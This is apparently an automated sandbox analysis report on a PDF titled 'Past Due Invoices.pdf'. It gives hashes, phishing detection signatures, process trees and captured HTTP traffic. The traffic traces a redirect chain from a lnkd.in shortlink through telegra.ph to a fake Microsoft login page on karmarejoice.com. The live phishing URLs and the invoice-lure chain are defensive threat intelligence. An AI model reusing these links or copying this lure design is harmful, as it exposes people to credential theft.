Edit tour

Windows Analysis Report
Past Due Invoices.pdf

Overview

General Information

Sample Name:	Past Due Invoices.pdf
Analysis ID:	626309
MD5:	fedf390692465b96a151685cc467ae62
SHA1:	d983b3484bab16f4d2b2318066e009d0126050e1
SHA256:	abbe28038526ba0fe28b0f39d224acaa67fb003adda280932939596c72833936
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Antivirus detection for URL or domain

Phishing site detected (based on logo template match)

Phishing site detected (based on image similarity)

Potential document exploit detected (unknown TCP traffic)

No HTML title found

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

HTML body contains low number of good links

Potential document exploit detected (performs HTTP gets)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

AcroRd32.exe (PID: 5268 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\Past Due Invoices.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)

AcroRd32.exe (PID: 6452 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)

RdrCEF.exe (PID: 1772 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 1320 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 596 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 6684 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

RdrCEF.exe (PID: 6072 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)

chrome.exe (PID: 6788 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAa MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
16391.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: lnkd.in

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dptWHpAa HTTP/1.1Host: lnkd.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Past-Due-Invoice-05-13 HTTP/1.1Host: telegra.phConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/quill.core.min.css HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/core.min.css?46 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/jquery.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/jquery.selection.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/autosize.min.js HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/load-image.all.min.js?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971f HTTP/1.1Host: t.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/quill.min.js?9 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/core.min.js?63 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/icons.png?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico?1 HTTP/1.1Host: telegra.phConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://telegra.ph/Past-Due-Invoice-05-13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /file/9f1d012ceb04882d3fbb6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
Source: global traffic	HTTP traffic detected: GET /images/favicon_2x.png?1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
Source: global traffic	HTTP traffic detected: GET /images/icons.png?1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: telegra.ph
Source: global traffic	HTTP traffic detected: GET /d-ad9VpM HTTP/1.1Host: lnkd.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lopi/office-RD117/ HTTP/1.1Host: karmarejoice.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.3.1/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://karmarejoice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://karmarejoice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/app.css HTTP/1.1Host: dancevida.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: dancevida.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lopi/office-RD117/images/bg.jpg HTTP/1.1Host: karmarejoice.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://karmarejoice.com/lopi/office-RD117/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: aadcdn.msauth.net
Source: global traffic	HTTP traffic detected: GET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: logincdn.msauth.net
Source: global traffic	HTTP traffic detected: GET /lopi/office-RD117/images/bg.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: karmarejoice.com

Source: unknown	HTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.164.13:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.219.60:443 -> 192.168.2.6:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.53.43.226:443 -> 192.168.2.6:49914 version: TLS 1.2

Source: Past Due Invoices.pdf	Initial sample: https://lnkd.in/dptWHpAa
Source: Past Due Invoices.pdf	Initial sample: https://lnkd.in/dptwhpaa

Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\Past Due Invoices.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
